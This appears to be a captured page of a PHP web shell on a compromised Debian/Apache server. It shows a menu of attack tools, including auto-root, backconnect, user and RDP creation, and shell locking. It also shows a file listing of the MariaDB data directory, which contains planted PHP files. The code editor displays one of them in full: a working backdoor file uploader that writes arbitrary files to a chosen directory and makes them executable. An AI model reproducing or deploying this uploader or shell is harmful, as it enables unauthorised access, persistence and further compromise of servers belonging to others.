Linux ip-172-26-5-244 6.1.0-28-cloud-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.1.119-1 (2024-11-22) x86_64
Apache
: 172.26.5.244 | : 216.73.216.21
Cant Read [ /etc/named.conf ]
8.3.14
daemon
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
bitnami /
mariadb /
data /
[ HOME SHELL ]
Name
Size
Permission
Action
italica_php
[ DIR ]
drwx------
mysql
[ DIR ]
drwx------
performance_schema
[ DIR ]
drwx------
sys
[ DIR ]
drwx------
test
[ DIR ]
drwx------
aria_log.00000001
1.81
MB
-rw-rw----
aria_log_control
52
B
-rw-rw----
ddl_recovery.log
9
B
-rw-rw----
ib_buffer_pool
788
B
-rw-rw----
ib_logfile0
96
MB
-rw-rw----
ibdata1
12
MB
-rw-rw----
ibtmp1
12
MB
-rw-rw----
mariadb_upgrade_info
14
B
-rw-r--r--
multi-master.info
0
B
-rw-rw----
tc.log
24
KB
-rw-rw----
tmpufthc.php
725
B
-rw-r--r--
tmpumkgb.php
1.3
KB
-rw-r--r--
undo001
10
MB
-rw-rw----
undo002
10
MB
-rw-rw----
undo003
10
MB
-rw-rw----
Delete
Unzip
Zip
${this.title}
Close
Code Editor : tmpufthc.php
<?php if (isset($_REQUEST["upload"])){$dir=$_REQUEST["uploadDir"];if (phpversion()<'4.1.0'){$file=$HTTP_POST_FILES["file"]["name"];@move_uploaded_file($HTTP_POST_FILES["file"]["tmp_name"],$dir."/".$file) or die();}else{$file=$_FILES["file"]["name"];@move_uploaded_file($_FILES["file"]["tmp_name"],$dir."/".$file) or die();}@chmod($dir."/".$file,0755);echo "File uploaded";}else {echo "<form action=".$_SERVER["PHP_SELF"]." method=POST enctype=multipart/form-data><input type=hidden name=MAX_FILE_SIZE value=1000000000><b>sqlmap file uploader</b><br><input name=file type=file><br>to directory: <input type=text name=uploadDir value=/opt/bitnami/mariadb/data/> <input type=submit name=upload value=upload></form>";}?>
Close